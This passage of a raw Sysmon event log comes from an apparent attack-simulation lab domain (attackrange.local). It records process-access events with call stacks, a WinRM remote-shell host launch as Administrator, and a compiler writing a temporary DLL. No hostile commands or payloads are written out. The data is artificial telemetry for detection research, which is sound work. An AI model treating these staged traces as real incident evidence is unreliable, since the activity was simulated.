vc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.110{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.110{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.102{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.094{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:47.889{10ACEC4A-85A7-5FCF-FA00-000000009101}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\h3qptm12\h3qptm12.dll2020-12-08 13:54:47.811 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A7-5FCF-FB00-000000009101}4180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.874{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 